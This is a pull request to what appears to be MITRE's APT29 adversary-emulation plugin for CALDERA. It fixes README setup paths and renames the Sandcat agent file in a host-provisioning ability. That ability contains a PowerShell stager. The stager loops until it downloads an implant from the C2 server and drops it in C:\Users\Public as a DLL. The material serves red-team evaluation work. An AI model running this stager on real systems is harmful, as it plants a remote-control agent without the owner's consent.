### PR TITLE
Updated reference to sandcat go binary used in CALDERA 2.6.6

### DIFF
--- a/adversary_emulation/APT29/CALDERA_DIY/evals/README.md
+++ b/adversary_emulation/APT29/CALDERA_DIY/evals/README.md
@@ -16,7 +16,7 @@ git clone https://github.com/mitre/caldera.git --recursive --branch 2.6.6 && sud
 
 2. Clone the Eval plugin into the caldera/plugins directory
 ```commandline
-cd plugins && git clone https://github.com/mitre/evals.git evals
+git clone https://github.com/mitre-attack/attack-arsenal.git && cp -R attack-arsenal/adversary_emulation/APT29/CALDERA_DIY/evals caldera/plugins/ && cd caldera
 ```
 
 3. Add the eval plugin to CALDERA config `conf/local.yml`
@@ -71,7 +71,7 @@ with the appropriate values for your environment. Keys to update include:
 #### Setting Up the CALDERA Server
 After initially cloning the CALDERA server, modify the ```conf/default.yml``` and set the CALDERA server's IP and port.
 
-* ```vim ../../conf/default.yml```
+* ```vim ./conf/default.yml```
 
 *Note, this is a relative path from the plugin's location.*
 
@@ -80,7 +80,7 @@ Prior to executing any of the commands listed below, certain payloads must be co
 To accomplish this, use the ```setup.py```. Python script located in the payloads directory of the evals’ plugin to dynamically 
 update the payloads to the appropriate IP and port.
 
-* ```python3 ./payloads/setup.py``` 
+* ```cd plugins/evals/ && python3 ./payloads/setup.py``` 
 
 
 ### Starting CALDERA

--- a/adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/host-provision/865b6ad9-ba59-435a-bd8f-641052fc077a.yml
+++ b/adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/host-provision/865b6ad9-ba59-435a-bd8f-641052fc077a.yml
@@ -14,7 +14,7 @@
           Move-Item -Force -Path .\MITRE-ATTACK-EVALS.HTML -Destination "C:\Users\#{profile_user_day2}\Documents";
           Set-Location -Path "C:\Users\#{profile_user_day2}\Desktop";
 
-          $url="#{server}/file/download"; $wc=New-Object System.Net.WebClient; $wc.Headers.add("platform","windows"); $wc.Headers.add("file","shared.go"); $wc.Headers.add("group","red-dll"); $wc.Headers.add("server","#{server}"); while($true) {try {if(($data=$wc.DownloadData($url)) -and ($name=$wc.ResponseHeaders["Content-Disposition"].Substring($wc.ResponseHeaders["Content-Disposition"].IndexOf("filename=")+9).Replace("`"","")) -and -not ([io.file]::WriteAllBytes("C:\\Users\\Public\\$name.dll",$data))) {break}} catch{sleep 60}};
+          $url="#{server}/file/download"; $wc=New-Object System.Net.WebClient; $wc.Headers.add("platform","windows"); $wc.Headers.add("file","sandcat.go"); $wc.Headers.add("group","red-dll"); $wc.Headers.add("server","#{server}"); while($true) {try {if(($data=$wc.DownloadData($url)) -and ($name=$wc.ResponseHeaders["Content-Disposition"].Substring($wc.ResponseHeaders["Content-Disposition"].IndexOf("filename=")+9).Replace("`"","")) -and -not ([io.file]::WriteAllBytes("C:\\Users\\Public\\$name.dll",$data))) {break}} catch{sleep 60}};
 
           if(Test-Path -LiteralPath "C:\Users\#{profile_user_day2}\Desktop\blob"){
             Remove-Item "C:\Users\#{profile_user_day2}\Desktop\blob" -Force;


### PR DESCRIPTION
During testing CALDERA 2.4 was originally used. This called for a different version of Sandcat at the time. When switching to CALDERA 2.6.6 Sandcat was updated and a `shared.go` changed to `sandcat.go`. 

This issue did not show up initially because `shared.go` did exist in our test environment due to previous testing. A fresh install will error out without this patch.